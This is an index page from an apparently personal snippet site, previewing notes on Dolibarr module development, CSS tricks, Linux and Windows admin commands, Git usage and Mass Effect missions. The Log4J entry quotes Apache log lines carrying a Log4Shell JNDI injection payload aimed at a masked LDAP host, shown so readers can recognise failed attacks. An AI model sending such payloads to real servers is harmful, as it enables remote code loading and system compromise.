Last Created

Latest created entries...
^Top
<< Back










Highlighted Entries

Add Module Tab

Views: 4 Created: 2023-01-10 08:47:25 Modified: 2023-03-18 02:03:03
// Array to add new pages in new tabs or remove existing one<br role="presentation" />$this-&gt;tabs =<br role="presentation" />array('objecttype:+tabname1:Title1:mylangfile@mymodule:$user-&gt;rights-&gt;mymodule-&gt;read:/mymodule<br role="presentation" />/mypagetab1.php?id=__ID_...

Add Module Menue

Views: 8 Created: 2023-01-10 08:47:25 Modified: 2023-02-26 01:00:25
// Main menu entries<br role="presentation" />$this-&gt;menu = array(); // List of menus to add<br role="presentation" />$r=0;<br role="presentation" />// Add here entries to declare new menus<br role="presentation" />// Example to declare the Top Menu entry:<br role="prese...

Add Module Permission

Views: 6 Created: 2023-01-10 08:47:25 Modified: 2023-03-25 08:59:18
$this-&gt;rights[$r][0] = 10001;<br role="presentation" />$this-&gt;rights[$r][1] = 'Label by default of permission';<br role="presentation" />$this-&gt;rights[$r][2] = 'r';<br role="presentation" />$this-&gt;rights[$r][3] = 1;<br role="presentation" /&...

Default Rights Variables

Views: 5 Created: 2023-01-10 08:47:25 Modified: 2023-03-16 08:13:00
Bank and Cash -&gt;banque-&gt;lire, -&gt;banque-&gt;modifier, -&gt;banque-&gt;configurer, -&gt;banque-&gt;consolidate, -&gt;banque-&gt;export, -&gt;banque-&gt;transfer, -&gt;banque-&gt;cheque Barcode -&gt;barcode-&gt;lire, -&gt;barcode-&gt;creer, -&gt;barcode-&gt;suppr...

Add Module Extrafields

Views: 3 Created: 2023-01-10 08:47:25 Modified: 2023-02-13 10:57:13
addExtraField ( $attrname,$label, $type, $pos,$size,$elementtype,$unique = 0,$required = 0,$default_value = '',<br role="presentation" />$param = '',$alwayseditable = 0,$perms = '',$list = '-1',$help = '',$computed = '',$entity = '',$langfile = '',$enabl...

Major Changes from v13 to v14

Views: 6 Created: 2023-01-10 08:47:25 Modified: 2023-03-24 20:38:17
* Module SimplePOS is deprecated. If you need a POS module, please use the module TakePOS.<br role="presentation" />* The ICS value for direct debit or credit transfer is now stored on each bank account instead of<br role="presentation" />into the global setup.<br role="presentation" />* API /setup/sh...

Remove a Hard-Deleted Module

Views: 3 Created: 2023-01-10 08:47:25 Modified: 2023-02-13 15:54:37
If you deleted a module via FTP or etc, and getting error messages about missing files - delete all module constants in llx_const. If the module name was "xxx" the consts would be: MAIN_MODULE_XXX<br />...

There is no custom directory

Views: 4 Created: 2023-01-10 08:47:25 Modified: 2023-03-22 20:59:28
This notice appears in the readme of almost all Dolibarr Modules.<br role="presentation" />Note: If this screen tell you there is no custom directory, check your setup is correct:<br role="presentation" />- In your Dolibarr installation directory, edit the ```htdocs/conf/conf.php``` file and check that<br role=&qu...

img_picto Function

Views: 6 Created: 2023-01-10 08:47:25 Modified: 2023-03-27 08:11:01
img_picto()<br role="presentation" />Example:<br role="presentation" />img_picto(path,name);<br role="presentation" />Usage:<br role="presentation" />img_picto() will print an image with the path and title provided in the function ...

GETPOSTISSET Function

Views: 5 Created: 2023-01-10 08:47:25 Modified: 2023-03-15 06:34:57
GETPOSTISSET()&nbsp; Example:<br role="presentation" />if (GETPOSTISSET('varname')){...}<br role="presentation" />Usage:<br role="presentation" />GETPOSTISSET will check if a $_POST or $_GET Variable with name "varname" is set...

GETPOST Function

Views: 5 Created: 2023-01-10 08:47:25 Modified: 2023-03-26 12:09:07
GETPOST Function to get a value out of $_POST or $_GET request.<br role="presentation" />Varname: Is the name of the vaue provided via the request. The value will be stored in<br role="presentation" />$monChamp.<br role="presentation" />INT: Is a checking string. In this case it checks the value of th...

Status Identifiers

Views: 10 Created: 2023-01-10 08:47:25 Modified: 2023-03-26 08:01:29
FK_STATUT<br role="presentation" />Angebote<br role="presentation" />&bull; 0 - Entwurf nicht best&auml;tigt<br role="presentation" />&bull; 1 - Amngebot ist offen<br />&bull; 2 - unterzeichnet / beauftragt / abrechenbar<br role="presentation" />&bull; 3- Nich...

Triggers

Views: 4 Created: 2023-01-10 08:47:25 Modified: 2023-03-20 06:30:59
Here you can see a list of general dolibarr triggers! Trigger code ($action) Type object ($object) USER_CREATE user.class.php USER_MODIFY user.class.php USER_DELETE user.class.php USER_LOGIN user.class.php USER_LOGIN_FAILED user.class.php USER_LOGOUT user.class.php USER_ENABLEDISABLE user.class.php USER_NEW_PASSWORD user.class.php USER_SETINGROUP u...

3.16.1 Keyboard Bindings

Views: 189 Created: 2022-02-16 16:17:13 Modified: 2023-03-20 20:42:34
Flight Radar --------------<br /> Tab&nbsp;&nbsp;&nbsp;&nbsp; PING<br /> Period&nbsp;&nbsp;&nbsp; INCREASE<br /> Comma&nbsp;&nbsp; DECREASE FLIGHT TARGETING --------------<br /> 9&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; HAIL TARGET<br /> 1-3&nbsp;&am...

Polkit PKExec Vulnerability

Views: 243 Created: 2022-01-29 22:58:22 Modified: 2023-03-28 05:12:33
The most actual systems have an update for this. If not you can close this vulnerability by executing:<br /> chmod 0755 /usr/bin/pkexec This will remove the SUID Bit from the File.<br /> More info here: https://nvd.nist.gov/vuln/detail/CVE-2021-4034 Image for the Thumbnail: ...

How does a Fail Log4J Attack look in Logfiles

Views: 408 Created: 2022-01-29 22:55:42 Modified: 2023-03-20 20:55:42
[Fri Jan 28 03:42:04.636333 2022] [proxy:warn] [pid 30819] [client 98.0.242.10:46192] AH10188: Max-Forwards value &#39;${jndi:ldap://X.X.X.X:1389/a}&#39; could not be parsed, referer: ${jndi:ldap://X.X.X.X:1389/a}<br /> [Fri Jan 28 03:42:04.636394 2022] [proxy:error] [pid 30819] [client 98.0.242.10:46192] AH00898: Max-Forwards request...

How to replace String in Text with SQL

Views: 460 Created: 2021-11-30 17:22:34 Modified: 2023-03-29 06:44:04
Here is an example how to replace for example the string &quot;https://test.de/testthis/&quot; with &quot;https://newlink.de/testthis/&quot;. The code is: UPDATE tablenamehere<br /> SET columnname = REPLACE(columnname , &#39;test.de&#39;, &#39;newlink.de&#39;); ...

How to Reverse an Android classes File

Views: 561 Created: 2021-11-06 00:55:37 Modified: 2023-02-25 08:19:23
1. Rename your .apk to .zip<br /> 2. Unzip<br /> 3. locate classes.dex<br /> 4. Download Dex2Jar (Windows/Linux)<br /> 5. Use cmd/shell to navigate to dex2jar Folder.<br /> 6. Use command &quot;dex2jar &lt;source&gt;&quot; with source as your classes.dex file.<br /> 7. Now you have a new .jar file...

Cipher Sheet

Views: 542 Created: 2021-11-06 00:22:05 Modified: 2023-03-13 02:06:07
Only to store. I am not working on this enigma Cr4P ...

Cipher Sheets

Views: 527 Created: 2021-11-06 00:17:44 Modified: 2023-03-13 02:06:07
Here are the copies of the unknown book that i found. Page after page... &nbsp; &nbsp; ...

General Informations about Cipher

Views: 590 Created: 2021-10-29 19:10:57 Modified: 2023-03-22 07:42:09
The &quot;Sommerton Man&quot; is an unknown person who died on the 30. Nov 1948 in Australia. Here you can get the Autopsy Report. The cause of death is unknown, but its rumored that he died from intoxication of an unknown poison.A Cipher has been found under mysterious cirmunstances which seems like a digitless code.<br /> <br /&g...

Content Security Headers

Views: 486 Created: 2021-10-17 04:21:30 Modified: 2023-03-20 20:54:19
Content Security Header (HSTS) Apache:<br /> Header set Strict-Transport-Security &quot;max-age=31536000; includeSubDomains; preload&quot; Nginx:<br /> add_header Strict-Transport-Security &#39;max-age=31536000; includeSubDomains; preload&#39;; Content Security Policy (CSP) Apache:<br /> Header always set Content-S...

Simple Firewall Setup Script

Views: 431 Created: 2021-08-16 16:24:41 Modified: 2023-03-29 11:31:26
Attention! This script has been written 2010 and could be outdated. Start.SH - Start Firewall #!/bin/sh<br /> #Start Firewall<br /> #Copyright by Xeno<br /> # echo<br /> echo Firewall Starter<br /> echo<br /> echo Die Firewall wird gestartet und der Port 22 SSH<br /> echo f&uuml;r die Fernkontrolle frei...

Pop Up with pure CSS and Checkbox

Views: 623 Created: 2021-08-06 02:06:40 Modified: 2023-03-20 20:37:16
&lt;!doctype html&gt;<br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &lt;meta charset=&quot;utf-8&quot;&gt;<br /> &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge,chrome=1&quot;&gt;<br /> &lt;meta name=&quot;viewport&quot; con...

Animated Border Box with CSS

Views: 561 Created: 2021-08-02 01:38:52 Modified: 2023-03-20 20:37:09
Code for an Animated Border on a Box, only with CSS and HTML used! &lt;style&gt;<br /> &nbsp;&nbsp; &nbsp;.container{&nbsp; padding-top: 20px;<br /> &nbsp;&nbsp; &nbsp;&nbsp; padding-bottom: 20px;}<br /> &nbsp;&nbsp; &nbsp; &nbsp;<br /> &nbsp;&nbsp; &nbsp;.b...

Generic HTACCESS Forces SSL & Non-WWW

Views: 402 Created: 2021-08-01 07:59:02 Modified: 2023-03-20 20:49:50
This is the code for an .htaccess file which does: -&gt; Redirect all www requests to non-www requests<br /> -&gt; Always force SSL<br /> <br /> RewriteCond %{HTTPS} !=on<br /> RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]<br /> RewriteCond %{HTTP_HOST} ^www\\.(.*)$ [NC]<br /> RewriteRule ^(....

Simple Pie Chart with HTML and CSS

Views: 509 Created: 2021-07-11 18:40:27 Modified: 2023-03-20 20:50:19
&lt;style&gt;<br /> .pie {<br /> &nbsp;&nbsp; &nbsp; /* Basic layout */<br /> &nbsp;&nbsp; &nbsp; display: inline-block;<br /> &nbsp;&nbsp; &nbsp; width: 10em;<br /> &nbsp;&nbsp; &nbsp; height: 10em;<br /> &nbsp;&nbsp; &nbsp; border-radius: 50%; ...

Flicker Text

Views: 542 Created: 2021-06-20 02:03:59 Modified: 2023-03-20 20:36:59
Flicker Text Example &lt;style&gt;@keyframes textflicker {<br /> &nbsp; from {text-shadow: 1px 0 0 #C1C1C1, -2px 0 0 #000000}<br /> &nbsp; to {text-shadow: 2px 0.5px 2px #C1C1C1, -1px -0.5px 2px #000000;}}<br /> #statered2 { padding: 1em;<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; colo...

Set A Forward Route

Views: 518 Created: 2021-03-23 21:32:23 Modified: 2023-03-18 10:39:32
Here is a sample command for cmd to set a Port Forwarding on a Windows Client Example:<br /> netsh interface portproxy add v4tov4 listenaddress=192.168.178.54 listenport=1254 connectaddress=192.168.178.55 connectport=80 ...

Commit an Update to Repository [CLI]

Views: 575 Created: 2021-03-09 11:33:33 Modified: 2023-03-28 05:18:17
Create a new Repository from Command Line echo &quot;# asd&quot; &gt;&gt; README.md<br /> git init<br /> git add README.md<br /> git commit -m &quot;first commit&quot;<br /> git branch -M main<br /> git remote add origin https://github.com/bugfishtm/asd.git<br /> git push -u origin main Pu...

Git Clone with Command Line

Views: 595 Created: 2021-03-09 10:56:46 Modified: 2023-02-26 20:25:53
How to use git to clone a remote repository? Open the CommandLine Navigate to the Folder You want to get the repository cloned to Execute Git Command: &quot;git clone https://yourgitlaburl.url/group/repository.git&quot; Now the actual repository files should be in your Folder. A successfull output looks like this: Cloning into &#39;exam...

Command Line Hints

Views: 641 Created: 2021-03-08 17:22:19 Modified: 2023-03-24 14:20:14
Find a String inside Files<br /> grep -rnw &#39;/path/to/somewhere/&#39; -e &#39;pattern&#39;<br /> <br /> Find File in Folder Structure<br /> find ./ -name card.php Display Linux System Informations<br /> uname Display Kernel Releases Informations<br /> uname -r Display Systems uptime and load av...

Postfix Backup Mailserver

Views: 607 Created: 2021-02-16 19:22:39 Modified: 2023-03-20 20:54:57
This is an easy postfix configuration to backup all emails going to specified domains until the master server is online again. &nbsp; Postfix Configuration [replace yourhostname with your hostname]: smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated reject_unauth_destination<br /> myhostname = yourhostname<br /> ...

Linux make file Immune

Views: 637 Created: 2021-02-13 10:44:11 Modified: 2023-03-29 11:08:32
This unix Command will make a file non-writable. Make non-Writable chattr +i file Make writable again chattr -i file See Status: lsattr file ...

Forward Port with IPTables

Views: 571 Created: 2021-02-09 09:24:37 Modified: 2023-03-23 10:12:01
This adds a rule to forwars port 1022 to port 22 (SSH) an another internal IP.<br /> iptables -t nat -A PREROUTING -i vmbr0 -p tcp --dport 1022 -j DNAT --to 192.168.137.100:22<br /> <br /> This removes the previous commands changes:<br /> &nbsp;iptables -t nat -D PREROUTING -i vmbr0 -p tcp --dport 1022 -j DNAT --to 192.1...

Proxmox Bridge and Nat Interfaces Example

Views: 616 Created: 2021-01-27 05:46:00 Modified: 2023-03-22 23:40:10
This script is for a proxmox host to set up 2 bridges. 1 provides static ip 4 and 6 to vservers<br /> 1 provides NAT routed connection &nbsp; Start of /etc/network/interfaces # This file describes the network interfaces available on your system<br /> # and how to activate them. For more information, see interfaces(5). source /etc/ne...

Safari Browser z-Index not Working

Views: 971 Created: 2020-12-22 01:41:41 Modified: 2023-03-20 20:36:53
If you encounter z-Index Problems on safari you can try to put that code into your z-indexed element: &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; -webkit-transform: translate3d(0, 0, 0);<br /> &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;transform: translate3d(0, 0, 0); ...

Prevent Padding and Border from changing Element Width

Views: 580 Created: 2020-12-21 19:55:51 Modified: 2023-03-20 20:36:47
Put this into an element to prevent padding / borders from changing the width of an element. -webkit-box-sizing: border-box; /* Chrome */ -moz-box-sizing: border-box; /* Firefox */ box-sizing: border-box; /* Opera/IE */ ...

Paragon Savegame

Views: 558 Created: 2020-12-09 06:54:39 Modified: 2023-03-20 20:42:25
You can download my full Paragon Savegame here! Details:<br /> -&gt; All Missions and DLC Mission achieved<br /> -&gt; Cerberus has taken over Collectors Ship<br /> -&gt; All Crew Members and Kaidan survived<br /> -&gt; Council Survived<br /> -&gt; ME2 has been played with ME1 full Paragon Savegame ...

Anomaly: Gei Hinnom

Views: 571 Created: 2020-12-09 06:50:52 Modified: 2023-03-20 20:42:19
Objective is to locate a protean sphere and report it to the citadel.<br /> Location: Gei Hinnom / Sheol / Hades Nexus Unfortunately there are no Images available. ...

Anomaly: Aequitas

Views: 536 Created: 2020-12-09 06:48:14 Modified: 2023-03-20 20:42:14
Objective is to clear the mine from transformed workers.<br /> Location: Aequitas / Fortis /&nbsp; Minos Wasteland<br /> Unfortunately we have no Images available related to this Mission. ...

Anomaly: Canalus

Views: 625 Created: 2020-12-09 06:44:33 Modified: 2023-03-20 20:42:09
Objective is to disable a Geth Weather device, which changes the planets atmossphere.<br /> Location: Canalus / Dirada / Pylos Nebula ...

Anomaly: Sinmara

Views: 545 Created: 2020-12-09 06:41:18 Modified: 2023-03-27 05:21:15
Objective is to repair the magnetic shield, which protects the planet from interstellar radiation.<br /> Location: Sinmara / Solveig / Caleston Rift ...

Anomaly: Zada Ban

Views: 541 Created: 2020-12-09 06:38:17 Modified: 2023-03-20 20:41:57
Objective is to destroy a vorcha weapons base and flee from the location.<br /> Location: Zada Ban / Xe Cha /&nbsp; The Shrike Abysall ...

Anomaly: Zanethu

Views: 581 Created: 2020-12-09 06:35:34 Modified: 2023-03-20 20:37:58
Objective is to secure mainframe data from an ancient ship, which is in danger to fall from a cliff.<br /> Location: Zanethu&nbsp; / Ploitari / Hourglass Nebula ...

Anomaly: Neith

Views: 590 Created: 2020-12-09 06:32:38 Modified: 2023-03-20 20:37:49
Objective is to disable the Rescue Beacon and fight the malfunctioning LOKI Mechs.<br /> Location: Neith / Amun / Eagle Nebula ...

Anomaly: Taitus

Views: 617 Created: 2020-12-09 06:29:52 Modified: 2023-03-27 19:50:10
Objective is to reactivate a mesh and use him to break all walls which are blocking the way to retrieve an ancient artifact.<br /> Location: Taitus / Talava / Caleston rift ...

Anomaly: Joab

Views: 546 Created: 2020-12-09 06:25:10 Modified: 2023-03-29 04:38:54
Illegal Mercenary Activity on this planet to take care of.<br /> Location: Joab / Enoch /&nbsp; Rosetta Nebula ...

Anomaly: Helyme

Views: 543 Created: 2020-12-09 06:22:17 Modified: 2023-03-27 20:53:35
Objective is to destroy a mercenary base and decrypt a hostile message.<br /> Location: Helyme / Zelene /&nbsp; Crescent Nebula ...

Get Remote HTML Code as String

Views: 693 Created: 2020-11-22 17:58:28 Modified: 2023-03-27 18:19:28
Here is an example function to get the full html output code of an URL provided to the function into a string.<br /> You can get the data by using a string variable which gets the output: string variable = gethtmlcontent(&quot;https://thisisapage&quot;); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&...
This Website is using Session Cookies for Site Functionality.